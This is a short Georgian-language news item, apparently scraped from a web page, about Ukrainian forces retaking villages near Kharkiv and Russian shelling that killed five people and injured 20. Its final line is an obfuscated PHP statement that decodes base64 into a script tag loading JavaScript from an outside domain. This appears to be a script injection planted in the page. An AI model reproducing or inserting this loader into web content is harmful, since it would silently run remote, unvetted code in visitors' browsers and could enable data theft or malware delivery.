celsiusi
ავერსი საქკაბელი
ხარკოვის სამხარეო ადმინისტრაციის ხელმძღვანელის, ოლეგ სინეგუბოვის განცხადებით, უკრაინულმა ძალებმა ოკუპანტებისგან რამდენიმე სოფელი გაათავისუფლეს.
 
კერძოდ, გათავისუფლებულია სოფლები: ბაზალიივკა, ლებიაჟე და კუტუზივკას ნაწილი.
 
ამასთან, ოლეგ სინეგუბოვის ინფორმაციით, რუსული ძალები ხარკოვის დაბომბვას აგრძელებდნენ.
 
„დღეს, დაიბომბა ქალაქის ცენტრალური ნაწილი, სალტივკას საცხოვრებელი ზონა, MLRS-სა [მრავალჯერადი სარაკეტო სისტემები] და არტილერიის გამოყენებით. სამწუხაროდ, დაშავდა 20 ადამიანი, დაიღუპა ხუთი. დაზიანდა საცხოვრებელი კორპუსები და სხვა სამოქალაქო ინფრასტრუქტურა“, - აცხადებს ხარკოვის სამხარეო ადმინისტრაციის ხელმძღვანელი.
793
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");